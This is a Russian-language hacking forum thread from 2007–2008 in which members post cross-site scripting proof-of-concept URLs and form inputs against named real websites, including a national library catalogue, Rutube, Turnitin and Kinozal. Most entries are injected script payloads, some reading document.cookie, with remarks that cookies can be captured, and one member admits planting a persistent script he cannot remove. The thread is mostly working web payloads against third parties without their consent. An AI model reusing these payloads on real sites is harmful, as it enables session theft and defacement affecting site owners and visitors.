1. Пост двух одинаковых тем в разных разделах - бан.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

XSS

Тема в разделе "Поиск уязвимостей", создана пользователем Constantine, 8 май 2007.

  1. EXploit
    EXploit Продвинутый
    Симпатии:
    25
    XSS в формах "год издания с"
    PHP:
    http://sigla.rsl.ru/results.jsp?f=1016&t=3&v0=&f=1003&t=1&v1=&f=4&t=2&v2=&f=21&t=3&v3=&f=1016&t=3&v4=&f=1016&t=3&v5=&bf=4&b=&d=0&ys=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&ye=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&lng=&ft=&mt=&doi=&dt=&vol=&pt=&iss=&ps=&pe=&tr=Cyr-Common&tro=&cc=n&i=1&v=tagged&s=2&ss=0&st=0&i18n=ru&psz=20&bs=20&ce=...U&debug=false
     
    4 ноя 2007
    1 человеку нравится это.
  2. logos
    logos Продвинутый
    Симпатии:
    11
    InDetails.info - обзор хак-софта:

    Код:
    http://indetails.info/index.php?module=detailed&id=406&s=0&n=10%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3Ca%3E&sort=date&sort_order=desc
     
    4 ноя 2007
  3. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    BlueSky
    Код:
    http://www.bluesky.ru/index.php?act=country&country_id=%22%3E%3Cscript%3Ealert('XSS%20by%20MoLoToK')%3C/script%3E
    
    можно поймать куки
     
    26 ноя 2007
  4. wriwel
    wriwel «ёлки!» Продвинутый
    Симпатии:
    59
    http://www.sharereactor.ru/cgi-bin/mzgenre.cgi?genre=%3Cscript%3Ealert('xaker.name')%3C/script%3E
    без фильтрации. что вписал то и получил=)
     
    3 дек 2007
  5. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    megashara
    Код:
    http://megashara.com/search.php?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&x=21&y=8
    очень странно ещё недели 2 назад не было
    ---

    Код:
    Bubblesnaps.com
    В правом верзнем углу в формах e-mail и password вводим код
    "><script>alert('XSS')</script>

    ---
    Код:
    http://www.writers.net/resources.php
    в search for books вводим "><script>alert('XSS')</script>

    ---
    turnitin.com

    Код:
    http://www.turnitin.com/quote_request.asp?account_type=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
    Добавлено через 15 часов 1 минуту
    Detstvo.ru
    Код:
    http://forum.detstvo.ru/showflat.php?Number=128342%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
    Код:
    http://detstvo.ru/auth/login.php?redirect=http%3A%2F%2Frecipe.detstvo.ru%2Fsearch%2F%3Fpath%3D%252Findex.html%26txt%3D%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252Fscript%253E%26cooking_time_cat%3D0%26cooking_time%3D%26calorie_cat%3D0%26calorie%3D%26food_type%3D0%26x%3D0%26y%3D0%26cooking_way%3D0%26diet%3D0%26cur_section%3D1%26sorttype%3D1
     
    Последнее редактирование: 5 дек 2007
    5 дек 2007
  6. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Код:
    http://www.getjar.com/products/11966/EQO
    жмём на [write a review], вылезает окно, в поле operator
    Код:
    "><script>alert('XSS')</script>
    жмём enter и видем alert
     
    8 дек 2007
  7. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    13 дек 2007
  8. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Код:
    http://www.plast.org.ua/pages/news_add.php
    в поле ваш особистий код пишем "><script>alert('XSS')</script>
    и жмём отримати код
    емейл пишем любой
    ---
    Код:
    http://www.passion.ru/modules.php?name=Salad&l_op=search&query="><script>alert('XSS')</script>
     
    Последнее редактирование: 20 дек 2007
    20 дек 2007
    1 человеку нравится это.
  9. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Kulichki.com
    Очень долго искал хоть какие-то уязвимости на этом сайте
    Код:
    http://phonecards.kulichki.com/reg/forgot-password.php?login=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
     
    21 дек 2007
  10. Don
    Don Новичок
    Симпатии:
    0
    visa.com.ru

    Код:
    
    
    ------------------------
    softportal.com

    Код:
    
    
     
    23 дек 2007
  11. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Код:
    http://www.gyre.org/subscribe/index.php
    "><script>alert('XSS')</script>
     
    27 дек 2007
  12. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    XSS на Rutube.ru
    Код:
    http://rutube.ru/login.html
    "><script>alert('XSS')</script>
     
    2 янв 2008
  13. wriwel
    wriwel «ёлки!» Продвинутый
    Симпатии:
    59
    Нашел методом тыка:
    http://gogo.ru/gogo/%3Cscript%3Ealert('xaker.name')%3C/script%3E
     
    3 янв 2008
    1 человеку нравится это.
  14. Anvil
    Anvil Мягкий и пушистый! Новичок
    Симпатии:
    30
    Код:
    http://xeno.ru/?c=2&act=order&tariff=X-100&step=1%3Ch1%3EHi.%20I%20am%20Anvil%3Ch1%3E
    
    Код:
    http://xeno.ru/?c=2&act=order&tariff=X-100&step=1%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
     
    3 янв 2008
  15. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    XSS на Инетболе
    Как обычно, месяц на сайте тусю и только щас XSS нашёл
    Код:
    http://inetball.ru/tt_placeCountries.asp?trID=8511&trName="><script>alert('XSS by MoLoToK')</script>
    ---

    в поле входа, е-мейл и пароль вместе
    Код:
    http://www.drtuning.ru/account/
    "><script>alert('XSS')</script>

    Добавлено через 3 часа 22 минуты
    Активная ХСС
    Код:
    http://sporu.net/new/
    В формах [сообщение][имя][е-мейл] "><sсriрt>аlеrt('ХSS')</sсriрt>
    правда я ступил, запостил, теперь каждый раз заходишь на стр. алерт выскакивает, а прав недостаточно чтобы удалить
     
    Последнее редактирование: 5 янв 2008
    5 янв 2008
  16. VecktorZona
    VecktorZona Продвинутый
    Симпатии:
    165
    Код:
    http://translate.google.com/translate?hl=ru&sl=en&u=http://advforum.shellmultimedia.com/comment/1055/script-alert-xss-script&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3D%2522%253E%253Cscript%253Ealert(%2527xss%2527)%253C/script%253E%252Bsite:*************%26hl%3Dru%26lr%3D%26client%3Dopera%26rls%3Dru%26sa%3DG
    Не знаю что может дать эт XSS,Прейдя по ссылки он пакозывает ип русского гугля, а зайдя на сам сайт только его назваие сайта. Зачит в самом переводчике есть XSS. Так как у мя утро и мозги уж спят,мож вы че надыбаете!!!:)
     
    7 янв 2008
  17. Anvil
    Anvil Мягкий и пушистый! Новичок
    Симпатии:
    30
    Код:
    http://www.kino.ru/search.php?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
     
    8 янв 2008
  18. MoLoToK
    MoLoToK Ленинград Продвинутый
    Симпатии:
    48
    Код:
    http://www.ultimate-guitar.com/submit/tabs.php?
    В tablature пишем "><script>alert('XSS')</script> раз 10 так как минимум 300 символов
     
    22 янв 2008
  19. GettoLove
    GettoLove Продвинутый
    Симпатии:
    34
    Код:
    http://www.kinozal.tv/my.php
    После логина на сайте, заходим на даную ссылку и в аватарке пишем: javascript:alert(document.cookie);
     
    24 янв 2008
    1 человеку нравится это.
  20. wriwel
    wriwel «ёлки!» Продвинутый
    Симпатии:
    59
    http://www.elib.ru/cgi-bin/Dict.pl?QUERY=D&D=1&ID=39472&WORD=%3Cscript%3Ealert('xaker.name')%3C/script%3E&LIKE=0
     
    9 фев 2008

Поделиться этой страницей

Загрузка...